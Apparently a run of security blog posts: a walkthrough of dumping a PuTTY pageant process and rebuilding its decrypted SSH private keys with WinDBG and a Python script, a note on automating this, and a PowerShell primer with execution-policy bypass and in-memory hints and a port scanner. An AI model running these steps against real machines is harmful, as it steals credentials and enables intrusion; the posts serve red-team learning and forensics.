  7. http://www.blackhat.com/presentations/bh-usa-08/Suiche/BH_US_08_Suiche_Windows_hibernation.pdf
  8. http://sandman.msuiche.net/docs/SandMan_Project.pdf
  9. http://stoned-vienna.com/downloads/Hibernation%20File%20Attack/Hibernation%20File%20Format.pdf
  10. http://stoned-vienna.com/html/index.php?page=hibernation-file-attack
  11. https://github.com/volatilityfoundation

Filed under: general Tagged: hiberfil.sys, hibernation, python, slack space, volatility

Discovering the secrets of a pageant minidump


A Red Team exercise is lotsa fun, not only because you have a more realistic engagement due to the broader scope, but also because you can encounter situations which you normally wouldn't on a regular narrow-scoped penetration test. I'm going to focus on pageant, which Slurpgeit recently encountered during one of these red team exercises and which piqued my interest.

Apparently he got access to a machine on which the user used pageant to manage ssh keys and authenticate to servers without having to type his key password every single time he connects. This of course raises the following interesting (or silly) question:

Why does the user only have to type his ssh key in once?

Which has a rather logical (or doh) answer as well:

The pageant process keeps the decrypted keys in memory so that you can use them without having to type the decryption password every time you want to use a key.

From an attacker's perspective it of course raises the question whether you can steal these unencrypted keys. Assuming you are able to make a memory dump of the running process, you should be able to get these decrypted ssh keys. In this blog post I'll focus on how you could achieve this and the pitfalls I encountered along the way.

Creating the process memory dump

First of all we need a memory dump; to create one we will use the excellent 'ProcDump.exe' utility from the sysinternals tools. This has the added benefit that it normally doesn't trigger any antivirus alarm bells, although if you've configured your HIPS correctly it might trigger some. The following command should do the trick to create a full process memory dump:

C:\>procdump.exe -ma pageant.exe
ProcDump v7.1 - Writes process dump files
Copyright (C) 2009-2014 Mark Russinovich
Sysinternals - www.sysinternals.com
With contributions from Andrew Richards
[03:56:37] Dump 1 initiated: C:\pageant.exe_150902_035637.dmp
[03:56:37] Dump 1 writing: Estimated dump file size is 84 MB.
[03:56:39] Dump 1 complete: 84 MB written in 1.7 seconds
[03:56:39] Dump count reached.

This should, as can be seen, create a full dump ('.dmp') file which you can then use for analysis. The full part (-ma) is important, or you won't be able to extract the juicy bits later on. If you are doing this during a red team exercise like Slurpgeit was, don't forget to add the '-accepteula' argument or your victim will get all kinds of popups. Another nice habit is to always (= as often as possible) make memory dumps of processes and grab the binaries. You should of course be aware that this might cause the process to crash, but sometimes the risk is worth it.

The unlucky shots

I first tried the 'non parsing' approach, which just involved searching around for RSA key finding tools and letting them loose on the dump file. This however did not result in any usable keys, which could partially be due to my impatience to extract the unencrypted private keys, which resulted in also using tools that are not really meant for this kind of memory dump format. The following is a list of tools / scripts that I tried (or attempted to):

At first I thought this might have to do with possible fragmentation of the memory regions in the dump format, but after learning more about the format this wasn’t really the issue in my dump.

The good thing about me not succeeding with the above mentioned tools is the fact that it pushed me to learn and understand the format of the process memory dump file produced by 'procdump.exe'. The bad thing is that it's become a lengthier post than at first expected :)

Getting to know the format

I then decided that I needed to understand the minidump format, which to my surprise seems to be mostly documented by Microsoft. A good starting point to understand this format is the blog post by @moyix, which also provides a great library to parse the minidump format.

In its most basic form the minidump format starts with a header from which you can begin parsing the dump file:

typedef struct _MINIDUMP_HEADER {
  ULONG32 Signature;
  ULONG32 Version;
  ULONG32 NumberOfStreams;
  RVA     StreamDirectoryRva;
  ULONG32 CheckSum;
  union {
    ULONG32 Reserved;
    ULONG32 TimeDateStamp;
  };
  ULONG64 Flags;
} MINIDUMP_HEADER, *PMINIDUMP_HEADER;
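Since the header is a fixed 32-byte structure, unpacking it yourself takes only a few lines. A minimal sketch (the 'MDMP' signature constant 0x504D444D comes from the Microsoft headers; the dictionary layout is my own):

```python
import struct

MDMP_SIGNATURE = 0x504D444D  # 'MDMP' read as a little-endian ULONG32

def parse_minidump_header(data):
    """Parse a MINIDUMP_HEADER from the first 32 bytes of a dump file."""
    (sig, version, nstreams, dir_rva,
     checksum, timestamp, flags) = struct.unpack_from('<IIIIIIQ', data, 0)
    if sig != MDMP_SIGNATURE:
        raise ValueError('not a minidump file')
    return {'NumberOfStreams': nstreams,
            'StreamDirectoryRva': dir_rva,
            'TimeDateStamp': timestamp,
            'Flags': flags}
```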

This header points to an array of stream directory entries which further describe the type and location of each stream:

typedef struct _MINIDUMP_DIRECTORY {
  ULONG32                      StreamType;
  MINIDUMP_LOCATION_DESCRIPTOR Location;
} MINIDUMP_DIRECTORY, *PMINIDUMP_DIRECTORY;

typedef struct _MINIDUMP_LOCATION_DESCRIPTOR {
  ULONG32 DataSize;
  RVA     Rva;
} MINIDUMP_LOCATION_DESCRIPTOR;

This is where at first I got a little bit confused, since I started to parse the wrong stream type. I chose to parse and investigate the 'MemoryInfoListStream' stream type, since I assumed it would contain the raw memory regions that hold the juicy info. Turned out it didn't contain the raw memory regions; it just contained a description of memory regions, their access rights, etc.

So after some fiddling around I finally found the 'Memory64ListStream' stream type, which does contain the correct structures to access the raw memory regions I was after. The fun part is of course that, after understanding all this, it turned out that the dump file just contains all the raw memory regions appended after the defined structures until the end of the file. If raw memory access were all you wanted, a pointer to the start of these regions would be enough. Like we'll see further down this blog post, that is not what we want, since we also need to find some specific offsets in these raw memory regions.

typedef struct _MINIDUMP_MEMORY64_LIST {
    ULONG64 NumberOfMemoryRanges;
    RVA64 BaseRva;
    MINIDUMP_MEMORY_DESCRIPTOR64 MemoryRanges [0];
} MINIDUMP_MEMORY64_LIST, *PMINIDUMP_MEMORY64_LIST;

typedef struct _MINIDUMP_MEMORY_DESCRIPTOR64 {
    ULONG64 StartOfMemoryRange;
    ULONG64 DataSize;
} MINIDUMP_MEMORY_DESCRIPTOR64, *PMINIDUMP_MEMORY_DESCRIPTOR64;

Like you can see, the first structure contains the 'BaseRva' pointer to the raw memory regions, which you need to increment with the size of each raw memory region if you want to read a specific region. This however I didn't realise until I read this article, even though the MSDN pages did state it:

Note that BaseRva is the overall base RVA for the memory list. To locate the data for a particular descriptor, start at BaseRva and increment by the size of a descriptor until you reach the descriptor.
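Put into code, that note boils down to a linear walk over the descriptors while accumulating sizes. A hypothetical helper that maps a virtual address to its file offset, assuming you already parsed the Memory64List into (StartOfMemoryRange, DataSize) tuples:

```python
def va_to_file_offset(base_rva, ranges, va):
    """Map virtual address va to its byte offset inside the dump file.

    ranges: list of (StartOfMemoryRange, DataSize) tuples in stream order.
    Returns None when va is not backed by any captured region.
    """
    rva = base_rva
    for start, size in ranges:
        if start <= va < start + size:
            return rva + (va - start)
        rva += size  # regions are stored back to back after BaseRva
    return None
```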

If you need a quick overview of the format, then the Minidump Explorer tool as well as moyix's library do a great job of showing you the parsed file:

mde_main_window

One of the things you can for example do with the library is to extract the raw memory and write it to a file:

#!/usr/bin/env python
"""
DiabloHorn https://diablohorn.wordpress.com

Writes the raw memory from a minidump to a file
"""
import sys
import os

try:
    import minidump
except:
    print "You need the minidump library"
    print "Download http://moyix.blogspot.com.au/2008/05/parsing-windows-minidumps.html"
    sys.exit()

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print "Usage %s %s" % (sys.argv[0], "<minidump_file>")
        sys.exit()

    minidump_filesize = os.path.getsize(sys.argv[1])
    rawmemory_filename = "%s.rawmem" % sys.argv[1]
    print ":::minidump filesize %s" % minidump_filesize
    f = open(sys.argv[1], 'rb')
    parsed_minidump = minidump.MINIDUMP_HEADER.parse_stream(f)
    f.close()

    for i in parsed_minidump.MINIDUMP_DIRECTORY:
        if i.StreamType == 'Memory64ListStream':
            rawmemory_size = (minidump_filesize - i.DirectoryData.BaseRva)
            print ":::Found raw memory data stream"
            print ":::Start of raw memory %s" % i.DirectoryData.BaseRva
            print ":::Size of raw memory %s" % rawmemory_size
            print ":::Writing raw memory to %s" % rawmemory_filename
            f = open(sys.argv[1], 'rb')
            f.seek(i.DirectoryData.BaseRva)
            data = f.read(rawmemory_size)
            f.close()
            f = open(rawmemory_filename, 'wb')
            f.write(data)
            f.close()

Manually finding the private keys

Now that we know the minidump format, let's see if we can find those decrypted private keys in the process's memory. We need to know how they are stored in the first place; how else are we going to search for them in the vast amount of raw memory bytes? Let's have a look at the source code first, since after all pageant is open source (putty git).

The decrypted key structure

My first thought was as follow:

Find the structure that holds the decrypted key values, convert it to a search pattern, search the dump file

The first file we will be looking at is 'winpgnt.c', which seems to contain the bulk of the code for the pageant binary. One of the things I always like to do when I have to look at source code is to just browse through the file to get a feeling for the structure of the code and how functions etc. are used by the author; might sound weird, but for me it works. After this I started pageant locally and added a freshly generated (puttygen.exe) key. This provided me with the names of the menus, which you can then search for in the code. I used the 'add key' text, since this menu item prompted me for the private key file and the corresponding password. This search should land you somewhere here:

 case 101: /* add key */
 if (HIWORD(wParam) == BN_CLICKED ||
 HIWORD(wParam) == BN_DOUBLECLICKED) {
 if (passphrase_box) {
 MessageBeep(MB_ICONERROR);
 SetForegroundWindow(passphrase_box);
 break;
 }
 prompt_add_keyfile();

Now if you follow that 'prompt_add_keyfile()' function and then the 'add_keyfile()' function inside it, you should eventually land on line 560 of winpgnt.c: 'skey = ssh2_load_userkey(filename, passphrase, &error);'. Now that looks like what we are after: a function which takes our file and our passphrase and hopefully returns the decrypted key.

To look at the function in more detail we have to open the file ‘sshpubk.c‘ and go to line 570 on which we’ll find:

struct ssh2_userkey *ssh2_load_userkey(const Filename *filename,
 char *passphrase, const char **errorstr)

So it seems that this function returns a ‘ssh2_userkey’ structure, which after reading the function’s code it indeed does contain the decrypted private key in a corresponding format:

This is how the ‘ssh2_userkey’ looks like:

struct ssh2_userkey {
 const struct ssh_signkey *alg; /* the key algorithm */
 void *data; /* the key data */
 char *comment; /* the key comment */
};

Which of course isn’t much to create a signature from, let’s have a look at that ‘ssh_signkey’ structure as well:

struct ssh_signkey {
 void *(*newkey) (char *data, int len);
 void (*freekey) (void *key);
 char *(*fmtkey) (void *key);
 unsigned char *(*public_blob) (void *key, int *len);
 unsigned char *(*private_blob) (void *key, int *len);
 void *(*createkey) (unsigned char *pub_blob, int pub_len,
 unsigned char *priv_blob, int priv_len);
 void *(*openssh_createkey) (unsigned char **blob, int *len);
 int (*openssh_fmtkey) (void *key, unsigned char *blob, int len);
 int (*pubkey_bits) (void *blob, int len);
 char *(*fingerprint) (void *key);
 int (*verifysig) (void *key, char *sig, int siglen,
 char *data, int datalen);
 unsigned char *(*sign) (void *key, char *data, int datalen,
 int *siglen);
 char *name;
 char *keytype; /* for host key cache */
};

That's a big list of pointers to functions... again not really suitable for creating a signature, in my opinion. This is partially due to the fact that you'd have to check all the pointers and see if they end up in executable code. Seems we have to dig into how the actual private key data is stored instead of the meta-info structures.
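That said, if you ever do want a heuristic instead of a signature, the pointer observation above can be turned into a simple plausibility check: a candidate ssh_signkey is only believable when all twelve of its function pointers fall inside the module's executable .text range. A hedged sketch (the text_start/text_end bounds would come from the PE headers):

```python
def plausible_ssh_signkey(pointers, text_start, text_end):
    """Heuristic check for a candidate ssh_signkey struct: every one of
    the twelve function pointers must land inside the module's
    executable .text section, otherwise it cannot be the real thing."""
    return (len(pointers) == 12 and
            all(text_start <= p < text_end for p in pointers))
```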

PE info & structures

You might now be going like 'whoaaa, but you said we would look into the actual key data structure'; yep, I said that. This is the exact same process I went through when I talked to Mitchel Sahertian, since he was thinking more along the lines of:

Searching for signatures isn’t really beautiful or error proof, why don’t you just access the structures like pageant itself does? It has to have a beginning somewhere to find all the keys.

Hmm, that didn't sound bad at all; let's see how pageant itself stores all the keys you load. One of the things that quickly becomes clear is that pageant has some functions whose names end with '234', and if you look those up you'll be reading through the 'tree234.c' file. Can't be any clearer: pageant is using a 2-3-4 tree for storage and retrieval of data. Yes, indeed, this is also the data structure used by pageant to store the key data. We know this because if we continue from line winpgnt.c:560, where 'ssh2_load_userkey' was called, and keep on reading to see what happens to the 'skey' variable, we'll end up at line winpgnt.c:687, which shows us 'if (add234(ssh2keys, skey) != skey)'. Now to verify that the 'ssh2keys' variable is indeed a 2-3-4 tree, we just search through the code and end up in the winmain function, where we find 'ssh2keys = newtree234(cmpkeys_ssh2);', confirming that it indeed is a tree.
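For reference, walking that tree in a raw dump only requires the node layout from tree234.c: a parent pointer, four kid pointers, four counts and three element pointers. A sketch of unpacking one node, assuming a 32-bit build (4-byte pointers) and some read_va() helper of your own that resolves virtual addresses in the dump:

```python
import struct

def parse_node234(read_va, node_va):
    """Parse one 32-bit node234 struct from dump memory.

    read_va(va, size) -> bytes is an assumed helper that returns raw
    bytes for a virtual address. Field order follows tree234.c:
    parent, kids[4], counts[4], elems[3] -- 12 dwords in total.
    """
    fields = struct.unpack('<12I', read_va(node_va, 48))
    return {'parent': fields[0],
            'kids': fields[1:5],
            'counts': fields[5:9],
            'elems': fields[9:12]}
```

Each non-zero entry in 'elems' would then be a pointer to an ssh2_userkey struct, and non-zero 'kids' entries point at child nodes to recurse into.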

The 'ssh2keys' variable is defined as 'static tree234 *rsakeys, *ssh2keys;', of which Mitchel reminded me that it's stored in the '.data' section of a PE file, and thus you can KNOW the offset at which the variable will be stored in memory, as also stated by the 'Peering inside the PE' article:

Just as .text is the default section for code, the .data section is where your initialized data goes. This data consists of global and static variables that are initialized at compile time. It also includes string literals. The linker combines all the .data sections from the OBJ and LIB files into one .data section in the EXE. Local variables are located on a thread’s stack, and take no room in the .data or .bss sections.

Now isn’t that nice? We actually have the starting point to the tree in which all the private key data is stored. From here we can parse the tree and extract the private key data, at least that’s the working theory. Let’s put it to the test.

From src to memory

Let’s see if we can find the data we want in the memory dump, to do that we need two things:

  • Offset to the ssh2keys variable in memory
  • Something to interpret the memory dump

For the first requirement we’ll use IDA and just load the binary into it, after some searching around, renaming functions and matching the disassembly to the src we have, we find the statically defined tree variable:

static_ssh_tree

Luckily for us it seems that pageant doesn't support ASLR, so the 00420D2C offset is perfectly usable, without any fiddling, to start the journey towards finding the decrypted private keys in memory.

Now that we have a starting offset we need a tool to interpret and navigate through the dump file that we have. For this we will be using WinDBG, which is part of the Debugging Tools for Windows collection. Since I'm no windbg expert it'll probably look clumsy, but for me it got the job done. Just load the dump file into windbg using the File->Open Crash Dump option. Now that the dump file is loaded you can enable the memory view by pressing alt+5; just make it nice and big to work with, since this will be the only view we'll be working with.

We'll enter the offset we have into the virtual text box at the top, which will present us with the following view:

mem_start_tree

Since memory is displayed in little endian it's kind of hard to read, so from now on we'll change the view to 'long hex', which makes it easier to work with offsets and view the data that we need. We will now just follow the next offset 002D1FA8 by entering it into the virtual text box, which will land us here:

mem_tree

At first it might not look like much when you land here, but if you have the tree234 implementation structures at hand it will start to make sense. The tree consists of a pointer to the first node and a comparison function. We can validate this because the second offset points into executable code. Let’s have a look at that first node:

mem_tree_node

Like you can see, this again matches the structure for a tree node. Since I had only loaded two keys into pageant there is no need for child nodes, and only two elements are in use, which should match the data for our keys. Like you'd imagine, since this is the first node in the tree, it doesn't have a parent node. Let's have a look at the first element:

mem_tree_element

Nice, seems we are getting back to the first structures we found in the src, since this is the ssh2_userkey structure which holds the decrypted data, thus confirming this indeed is the tree that holds all the decrypted private keys. To fully confirm it we can look up the comment pointer, which should contain the comment for the key that I loaded into pageant:

key_comment

I changed the view from ‘long hex’ to ‘ASCII’ and yes this is indeed the default comment as generated by puttygen.

OK, now what? Even though with this cleaner method we have a good way to enumerate all the loaded private keys, we still need to extract the actual data. As for that unfinished sentence about key data structures: seems we'll have to dig into it after all.

The key format

So let’s pick up where we left off, this is how the key data is stored in memory if you follow the “void *data” pointer:

key_data

Like we can see, the struct has a variable part which doesn't seem to be used if you use the binary downloaded from the official website. One of the things that kept me busy for some time were the first two fields, 'int bits' and 'int bytes': their values in the memory dump didn't seem to match any logical size for the key or the struct. It was not until I debugged a running pageant instance with ollydbg (I usually trust binaries more than the src, you never know what a compiler might have done) that I realised they really don't seem to be used, although they are present in the struct. This seems to be confirmed by the src, which also doesn't contain a reference to those fields being set. I might still have missed something, so please let me know if I did.

So the only thing left to figure out is the Bignum type which seems pretty well commented in the ‘sshbn.c‘ src:

/*
 * The Bignum format is an array of `BignumInt'. The first
 * element of the array counts the remaining elements. The
 * remaining elements express the actual number, base 2^BIGNUM_INT_BITS, _least_
 * significant digit first. (So it's trivial to extract the bit
 * with value 2^n for any n.)
 *
 * All Bignums in this module are positive. Negative numbers must
 * be dealt with outside it.
 *
 * INVARIANT: the most significant word of any Bignum must be
 * nonzero.
 */

The ‘BignumInt’ itself, if I’m not mistaken is defined in ‘sshbn.h‘ as:

#elif defined __GNUC__ && defined __i386__
typedef unsigned long BignumInt;

So it seems that our numbers are stored as an array of four-byte elements, where the first element of the array tells us how many other elements are left to read. That seems about right if we have a look at, for example, the 'private_exponent' struct member in windbg:

key_bignum2
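Decoding such a Bignum back into a Python integer is then just reading the leading count word and accumulating 32-bit little-endian digits; a sketch assuming the 32-bit build (i.e. BignumInt is 4 bytes):

```python
import struct

def parse_bignum(data, offset=0):
    """Decode putty's Bignum format: a leading 32-bit word count,
    followed by that many 32-bit words, least significant word first."""
    (count,) = struct.unpack_from('<I', data, offset)
    words = struct.unpack_from('<%dI' % count, data, offset + 4)
    value = 0
    for i, word in enumerate(words):
        value |= word << (32 * i)
    return value
```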

 

Now that that's clear, let's have a look at turning this information into usable private keys which we can actually use to authenticate against servers.

Creating usable private keys

So before we just dive blindly into this, let’s think about it:

  • We have the primitives used for RSA operations
    • They were obtained from a key file format
  • We need a key file format again

Heh, that sounds funny put into perspective like that. My first thought was to just produce a putty key file again; we began our journey on Windows with pageant, after all, right? The format, if you are wondering, is described in the file 'sshpubk.c', starting on line 378.

Then again why not put it into a more universal format like the OpenSSH one:

-----BEGIN RSA PRIVATE KEY-----
all kind of base64 encoded data
-----END RSA PRIVATE KEY-----

At least with this format a lot of tools are able to work with it, which in the end is just what we need if we want to use the keys to start plundering servers, so to speak. This however is not something that you want to do manually, since it turns out that the base64 encoded data contains a DER (or BER) encoded ASN.1 structure. If you want to visualise this you can use this online ASN.1 decoder, which accepts the base64 encoded form of the key and then generates a hierarchical structure side by side with the hex dump.

Luckily for us pycrypto exists, which makes it a lot easier to create workable private keys from the primitives that we have, since it has a function which accepts those primitives and does all the hard work for us:

Construct an RSA key object from a tuple of valid RSA components.

See RSAImplementation.construct.

Parameters:
 tup (tuple) - A tuple of long integers, with at least 2 and no more than 6 items. The items come in the following order:

 RSA modulus (n).
 Public exponent (e).
 Private exponent (d). Only required if the key is private.
 First factor of n (p). Optional.
 Second factor of n (q). Optional.
 CRT coefficient, (1/p) mod q (u). Optional.
Returns:
 An RSA key object (_RSAobj).

Using this is relatively simple: all we have to do is extract the hex values from the memory locations we talked about before, be careful with endianness, and feed those values to the function like this:

#!/usr/bin/env python
"""
DiabloHorn https://diablohorn.wordpress.com

Converts rsa primitives extracted with windbg from memory
to a workable rsa private key format
"""
import sys
import base64
from Crypto.PublicKey import RSA

def string_to_long(data):
	data = data.split(' ')
	data.reverse()
	return long(("".join(data)),16)

if __name__ == "__main__":
	#setup the primitives
	rsamod = string_to_long('7955549b 79eb3c32 ee6e6b2c 405d4cfb c22ae82b a467ac7b 0f5875bb 5fec483b 72b26f8a 8c27373f a1abcfff d142c88a 88564e3b 1c45d0c4 53535ca6 72695f43 6fdde462 32741a1f ff1e0440 219fffea 04beaa49 73308e60 2a3e7ba6 644f51ba 8a4ddf2d 1fe2ba37 e7bcf094 adf5a610 3845feb6 2349edf5 2eb40451 e0ed9d03 923a0a70 e835a702 b0d4887b a20493ed 17c55930 29b672c9 167dc521 80327c02 daf9b3fe f3c39157 cffb8360 96c5d8db 670e1092 6d4e9f0d 2f517912 d42b8ce1 6fea58d5 7038f788 115a1eaa e5963585 7cdcd082 64d0a88c 66a4a66f fa3648ae c2fb89bc 099a73f7 f3292ffa ce2c2428 55da8859 ce045224 6190274f b1652f29')
	rsapubexp = long(0x25)
	rsaprivexp = string_to_long('a396f24d 8fd800ec 6dc00c2e abcd8943 a98f0d92 217299a8 a1ba8dcf c5b87820 96373ebe 76c0a795 92340c3b 05651d18 9ccf90bc 108c2ab3 329fc033 d36e9837 c3f7e413 22c62633 7b854536 acbd5c31 cbe7c3a3 a292eb62 b5c4146d 9f55ffa6 5d241da1 608fcce7 d2de7859 b76b703a c9960358 734329ad 13781aec 3af1eb80 fdf94703 5ac52b0f 9b12eee4 5064b34a 600635f8 c900a55c 65deff1b 41e51bca 8df3ce28 a9a3daa3 ec869e81 699101cc a95ecf9d 2b26323b e95fefd1 8154eba7 3b2c20ea 18d5c879 00b34a20 c05b4199 46051d66 69393345 a21b3f56 0fe84abb a35d2060 61fdf275 7f9f0c85 cf556a67 c478d31a dd0a8a02 1a640542 94a0e253')

	rawkey = (rsamod,rsapubexp,rsaprivexp)
	#construct the desired RSA key
	rsakey = RSA.construct(rawkey)
	#print the object, publickey, privatekey
	print rsakey
	print rsakey.publickey().exportKey('PEM')
	print rsakey.exportKey('PEM')

Like you can see, I've been lazy and kept the windbg display format on a single line, which for now works fine. With the exported private key you could now attempt to connect to any server on which this key is valid.

Finally let’s compare the keys to make sure they really are the same, I used puttygen for this since it’s nice and visual:

key_compare

On the left is the key extracted from memory and imported into puttygen; like you can see, it has no passphrase. On the right is the original key that I imported into pageant; you might recognise the comment from the earlier screenshots, taken when I started to write this blog post.

Conclusion

So even though at first the memory dump of a process seems like a collection of gibberish, there is a lot of information you can still find in it and access in a structured way, just like how volatility makes the big pile of bytes in a computer memory dump accessible in a structured way.

Of course this exercise has been a lot easier due to the availability of pageant's source code, but the approach still applies to a lot of processes / applications out there. The way that mimikatz is able to extract passwords from an LSASS process memory dump is one such example.

If however for some reasons you are not able to access the information in a structured way you could always just search for the structure in which the information is kept. In this case after obtaining a clear picture of all the structures this would certainly have been possible.

Like you can imagine, there is a lot more to be extracted from the process memory dump of pageant, since it contains two more interesting trees: one for other types of keys and one for short-term passwords. So if you want a nice exercise you should definitely play with it, since having the source code really is a big advantage.

Some things still left to do:

  • Automate this process with python and moyix’s library
  • Create a volatility plugin

Hope you had as much fun reading this as I had writing it and learning a lot while doing so.

References


Filed under: general, security Tagged: memory, minidump, pageant, rsa key, windbg

pageant key extraction automated


Well, this will be a rather short post, since it's about the automation of my previous blog post, in which we analysed the memory dump of the pageant process and manually extracted unencrypted keys. You can find the tool which automates this process in the pageant_xkeys git repository. Since I'm a firm believer that you learn best from mistakes and old code, the repository also includes some of the other code I was playing around with.

 


Filed under: general Tagged: capstone, memory dump, pageant, pycrypto

PowerShell overview and introduction


This is a long overdue post I was planning on writing as a reference for myself, since I don't write that much PowerShell. Depending on your own knowledge of PowerShell you can just skip to whatever section seems useful to you. Also feel free to correct any mistakes in this article, since I intend it mostly as a basic reference :) The resource section contains a nice collection of links to other PowerShell articles & tools, which means you can consider this article a small recap of all the resources linked.

TL;DR The resource section contains useful URLs to learn PowerShell; the blog post itself is just a micro-recap of those resources.

  • What is PowerShell and why would you use it?
  • Basic PowerShell environment
  • How do you run PowerShell?
  • What is the PowerShell syntax?
  • Our first script
  • Calling Windows functions
  • Resources


What is PowerShell and why would you use it?

PowerShell is the “new” scripting language for the Windows operating system. It’s built upon the .NET framework and fully object oriented. Even the output is an object, which means that the text you see on screen is usually only a subset of what the object is made of. This might take some getting used to, but in the end it’s well worth the effort. You could compare it to bash under linux, but in my opinion it’s much more powerful.

One of the reasons is that it’s so tightly integrated with a lot of Windows components and Windows itself, which makes it the perfect language to perform administration on Windows. Like we all know, when hacking Windows networks a lot of the time you are mainly performing administration tasks or obtaining access by abusing administrative workflows.

Like you can read the main reason to want to use PowerShell is the fact that it’s fully integrated into the operating system. That means that in theory you don’t need to introduce any foreign executables onto a system and you could perform all your actions in an obfuscated and in-memory only way.

Basic PowerShell environment

Even though PowerShell is integrated into the operating system it’s still pretty useful to understand the basic PowerShell environment as well as how to get around with the built-in help. After all, however unlikely it may seem, sometimes you won’t have access to the internet and you will need to handle yourself in PowerShell without it.

So just like linux one of the most helpful commands is ‘man’, yup that works, just like ‘alias’. Kid you not!

man alias
alias | findstr "help"

Those commands just work under PowerShell and are more or less the basics of starting out. However we still need a way to list almost all possible commands under PowerShell. You can more or less achieve this by doing:

Get-Help *

Since everything is an object you might want to know what the members or methods available are for an object. You can use Get-Member for this:

(dir)[0] | Get-Member

That might look like gibberish, but it translates to “get the first object from the result of the dir command”, parentheses are there to indicate order and the “[0]” notation is the usual array accessing one. If you are wondering how to figure the above out, it would be by reading the following:

man Get-Help
man Get-Member
man about_arrays
man about_Command_Syntax

So like you can see even without internet you can get pretty far by just reading the available help. Admittedly you have to do more reading than just directly searching for the answer on google. Fun stuff you can do with simple commands is stuff like:

(dir) | foreach-object -process {$_.lastaccesstime}

Which prints out the lastaccesstime for all the objects outputted by the dir command. This is again a reminder that with PowerShell you will usually see less on the screen than what the actual object holds, which more or less makes Get-Member mandatory to really know what kind of data is available after you run a command or cmdlet.

How do you run PowerShell?

Running PowerShell is pretty straightforward if we leave the execution policy out of the equation for a moment:

powershell

 

Like you can see you can execute PowerShell code from within PowerShell or by passing your code as a command line argument to the ‘powershell.exe’ executable. You can of course also execute code which resides in a separate file, a script file if you will:

[cmd.exe]
powershell.exe -File test.ps1

[powershell prompt]
.\test.ps1

Which will probably give you a big nasty ugly error about the execution policy. Before we even start bypassing the execution policy, let’s first check it out. Copy-pasting directly from Microsoft, they say the following:

    The execution policy is not a security system that restricts user actions.
    For example, users can easily circumvent a policy by typing the script
    contents at the command line when they cannot run a script. Instead, the
    execution policy helps users to set basic rules and prevents them from
    violating them unintentionally.

Well that at least creates the right expectations. Seems that the execution policy is certainly not intended to prevent anyone from running scripts on purpose, only by accident. This is also very visible if you search around for ‘execution policy bypass’ in which the first hit is actually a pretty great article which depicts 15 ways in which you can bypass the execution policy.

An important note with the whole execution policy bypass thing is not to forget about the PowerShell scope, since this can sometimes be the difference between the bypass working or not working. Microsoft makes the precedence order really easy to understand:

        - Group Policy: Computer Configuration
        - Group Policy: User Configuration
        - Execution Policy: Process (or PowerShell.exe -ExecutionPolicy)
        - Execution Policy: CurrentUser
        - Execution Policy: LocalMachine

Always make sure to try the most narrow scope before you give up on an execution policy bypass trick :-)

What is the PowerShell syntax?

This is just something of personal preference, but I always like to at least have somewhat of a notion of the language’s syntax before I just start out trying stuff. Also like explained at the beginning of my blog post, everything is a recap from the resources linked in this article. If you want a more extensive explanation make sure you check the resource section or the link previously mentioned.

semicolons

Those are not needed to terminate statements. You can however use them to separate statements on the command line.

escape character

The backtick (grave accent) represented as the character ` is the escape character within PowerShell. You can use this character to for example print tabs `t or escape characters with a special meaning like the $ character as in `$ or escaping quotes like `”.

You can also use the backtick character to span your statements over multiple lines, which can sometimes come in handy.

variables

Variables in PowerShell have a ‘$’ sign in front of them, like:

$myvar = 'some value'
$myothervar = 42

single & double quotes

There actually is a distinction when using these. The single quote represents everything literally, the double quotes interpret what’s inside them.

$dummyvalue = 'dummy'
write 'test$dummyvalue'
write "test$dummyvalue"

The first one will print ‘test$dummyvalue’, the second one will print ‘testdummy’. And like most scripting languages you can use the quotes to encapsulate each other like “soo he said ‘wow’, jus he did”.

brackets and colons/periods

The round brackets, parentheses, ‘(‘ and ‘)’ can be used to specify order and to pass arguments to .NET methods. When calling functions you defined in PowerShell you pass the arguments SPACE separated and without parentheses, since they could cause an error.

The square brackets can be used to access list/array members like most languages:

$test = 1,2,3,4,5
write $test[0]

The above will produce the output ‘1’ since it’s accessing the first member of the array. The other use case for these brackets is to define types and to access .NET classes as in:

$test = [DateTime]
write $test::now

The above will print the current date time. Like you can see here you can use a double colon to access properties of a class; to access methods you can use the period character:

$test = New-Object System.datetime
write $test
write $test.AddYears(2015)

Which doesn’t do that much except print the year 2016 and demonstrate how to access methods.

Functions

So there is an important distinction between calling functions and calling methods. Functions in PowerShell use spaces for the parameters and not brackets, which you might confuse in the beginning when you mix in calls to methods.

We could go on endlessly about all the syntax, but usually for me this is the basics. The other stuff you can read from the linked ‘PowerShell syntax’ section in the resource section or google around for it. You might be thinking YOU FORGOT CONTROL FLOW stuff, but those don’t really vary that much from other languages :)

Our first script

As usually advised in the infosec community, learning by doing teaches best. Let’s write some useful scripts to learn a bit more about PowerShell scripting. Try to understand them and google the unknown bits =)

Portscanner

[CmdletBinding()]
Param(
		[Parameter(Mandatory=$true)][string]$myhost,
		[int[]]$myports=(80,443)
	 )

#Simple port scanner example
#DiabloHorn - https://diablohorn.wordpress.com

foreach($myport in $myports){
	try{
		$scanner = New-Object System.Net.Sockets.TcpClient($myhost,$myport)
		#returns if it's connected
		Write-Output "$myhost`t$myport`t$TRUE"
		$scanner.Close()
	}catch{
		#any exception will pretend the port was closed
		Write-Output "$myhost`t$myport`t$FALSE"
	}
}

 

Calling Windows functions

One of the main advantages of PowerShell in my opinion is the fact that besides fully integrating with the .NET framework you are also able to call native win32 API functions. This adds the benefit that you can do a lot of cool stuff and also perform a large part of that cool stuff in memory only. As an example the following code calls the MessageBox win32 API:


$c_sharp_code = @'
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int MessageBox(IntPtr hWnd, String text, String caption, int options);
'@
#Write-Output $c_sharp_code
$user32dll = Add-Type -MemberDefinition $c_sharp_code -Name 'User32' -Namespace 'Win32' -PassThru
#Write-Output $user32dll
$user32dll::MessageBox(0,"hello from powershell","PS Hello",0)

The actual explanation for the above can be found in the resource section under “Accessing Windows API”. For now the most important bit to know is that PowerShell actually in-memory compiles the code into a class which you can then just use; this is called Platform Invoke (P/Invoke) for unmanaged functions. This is the supported method as far as I know and the one a lot of examples use. The drawback however can be that some disk interaction takes place, so if you want to fully remain in memory you’d have to look up the methods described by Matt Graeber which remain fully in memory; they are referenced in an excellent blog post by harmj0y in the resource section of this blog.

Resources

This section contains more or less all the resources I’ve used in the past when learning PowerShell and each and every time I need to refresh my memory on the topic, since I don’t write PowerShell that often. Feel free to leave additional useful resources in the comments :)


Filed under: general Tagged: powershell

Idea: Abusing Google DLP for NSA-style content searching


